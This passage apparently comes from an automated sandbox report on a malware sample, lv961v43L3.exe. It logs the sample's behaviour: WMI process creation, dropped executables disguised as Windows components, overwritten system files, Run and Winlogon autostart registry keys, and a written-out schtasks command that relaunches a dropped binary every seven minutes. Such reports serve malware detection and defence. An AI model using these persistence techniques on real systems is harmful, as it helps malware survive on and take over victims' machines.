                              Source: lv961v43L3.exe, LDdA7hUfxejBNf3yW9L.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'bl6Un7dve6', 'Write', 'Bf4UcZreW2', 'HnlUYZVQOT', 'Flush', 'vl7'
                              Source: lv961v43L3.exe, U9kHoS1E9uyTmInARU0.csHigh entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'PdN1YzfY3sc', 'Qt91L1x8x8D', 'YX5EV71UrjZ0CRQtoMO6', 'IahgNB1Uaq0hAsCFwKhN'

                              Persistence and Installation Behavior

                              barindex
                              Creates processes via WMI
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Drops executables to the windows directory (C:\Windows) and starts them
                              Source: unknownExecutable created and started: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                              Source: unknownExecutable created and started: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe
                              Source: unknownExecutable created and started: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\gBplMliu.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Recovery\apERZQztEJsqymITPFxguVe.exeJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\oTYKBhgS.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\ExWQYAoA.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\zpwiWXhy.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\DBipIDSx.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\QaswzdXY.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\XuBMTZHB.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\UQjmGZYR.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\ekFuRFbl.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\HkLqVmri.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\ysVaBXSD.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\yHDAltbA.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\MnaxWgIk.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\sVoRDbyU.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\xIFQfYNI.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\Gnkizmcn.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\SzzvMtRI.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\BQDZBqHE.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\LRfgsxYe.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\KzWplSMm.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\OpNfsPNf.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\Babyelsr.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\blrDaWHv.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\KdaYGjcg.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\CEHhnDDC.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\ksfcTiin.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\kjvJoyHh.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\aJMMjFdF.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\jFctadEf.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\HrZgPASq.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\kTLTKyNc.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\erTkMTCt.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\rJPAIehM.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\yGhYBYcD.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\pHdSnvcQ.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\ciTLwWWp.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\Default\SystemSettings.exeJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\vzGrPbhF.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\aBctEWCA.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\Default\SystemSettings.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\gBplMliu.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\erTkMTCt.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\OpNfsPNf.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\DBipIDSx.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\kjvJoyHh.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\aBctEWCA.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\KzWplSMm.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\BQDZBqHE.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\yGhYBYcD.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\ExWQYAoA.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\UQjmGZYR.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\MnaxWgIk.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\CEHhnDDC.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\sVoRDbyU.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\ksfcTiin.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\aJMMjFdF.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\QaswzdXY.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\HrZgPASq.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\user\Desktop\xIFQfYNI.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\jFctadEf.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\LRfgsxYe.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\ysVaBXSD.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\Babyelsr.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\kTLTKyNc.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\blrDaWHv.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\KdaYGjcg.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\zpwiWXhy.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\pHdSnvcQ.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\XuBMTZHB.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\Gnkizmcn.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\vzGrPbhF.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\ciTLwWWp.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\SzzvMtRI.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\rJPAIehM.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\HkLqVmri.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\yHDAltbA.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\oTYKBhgS.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile created: C:\Users\user\Desktop\ekFuRFbl.logJump to dropped file

                              Boot Survival

                              barindex
                              Creates an autostart registry key pointing to binary in C:\Windows
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run apERZQztEJsqymITPFxguVeJump to behavior
                              Creates an undocumented autostart registry key
                              Source: C:\Users\user\Desktop\lv961v43L3.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Creates multiple autostart registry keys
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run apERZQztEJsqymITPFxguVeJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettingsJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lv961v43L3Jump to behavior
                              Drops PE files to the user root directory
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile created: C:\Users\Default\SystemSettings.exeJump to dropped file
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 7 /tr "'C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe'" /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run apERZQztEJsqymITPFxguVeJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run apERZQztEJsqymITPFxguVeJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettingsJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettingsJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lv961v43L3Jump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lv961v43L3Jump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lv961v43L3Jump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lv961v43L3Jump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run apERZQztEJsqymITPFxguVeJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run apERZQztEJsqymITPFxguVeJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run apERZQztEJsqymITPFxguVeJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run apERZQztEJsqymITPFxguVeJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run apERZQztEJsqymITPFxguVeJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run apERZQztEJsqymITPFxguVeJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
